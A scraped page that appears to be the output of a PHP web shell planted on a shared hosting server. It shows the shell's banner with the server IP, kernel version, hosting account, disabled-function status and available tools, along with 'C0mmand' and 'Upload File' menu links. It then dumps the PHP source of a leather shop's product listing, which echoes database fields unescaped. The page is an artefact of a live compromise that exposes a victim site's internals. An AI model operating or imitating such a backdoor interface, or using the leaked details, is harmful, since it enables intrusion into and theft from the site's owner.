Server IP : 103.53.40.154 / Your IP : 3.145.7.187 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/leatheroncall.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Begin Featured Porduct Section --> <section class="featured-pro featured-pro-2 pt-95"> <div class="container-fluid pl-40 pr-40"> <div class="row"> <div class="col-lg-12"> <!-- Begin Featured Product Title Area --> <div class="pos-title pos-title-2"> <h2>New Products</h2> <p>"Unleash Your Inner Sophistication with Leather"</p> </div> <div class="row"> <!-- .....product---start.... --> <?php $sqlpd = "SELECT * FROM `tbl_product` ORDER BY `p_id` DESC LIMIT 4"; $runpd = mysqli_query($db,$sqlpd) or die("Query Not run"); while($datapd = mysqli_fetch_assoc($runpd)){ ?> <div class="col-md-3 " data-aos="fade-up"> <div class="box"> <div class="product-image"> <a href="<?php echo $wspath?>product-detail<?php echo $datapd['slug_link']?>.html"> <img style="width:100%;height: 250px;" src="<?php echo $wspath?>admin/images/<?php echo $datapd['img1']?>" alt="<?php echo $datapd['product_name']?>" class="img-fluid"></a> </div> <div class="product-detail"> <a href="<?php echo $wspath?>product-detail<?php echo $datapd['slug_link']?>.html"><h3><?php echo $datapd['product_name']?></h3></a> </div> </div> </div> <?php } ?> <!-- .....product---end.... --> </div> <div class="col-lg-12"> <div class="default-btn-2 slide-btn"> <a style="margin: auto;display: block;" class="links links-4 " href="<?php echo $wspath?>product.html">View More</a> </div> </div> </div> </div> </div> </section> <!-- Featured Porduct Section End Here -->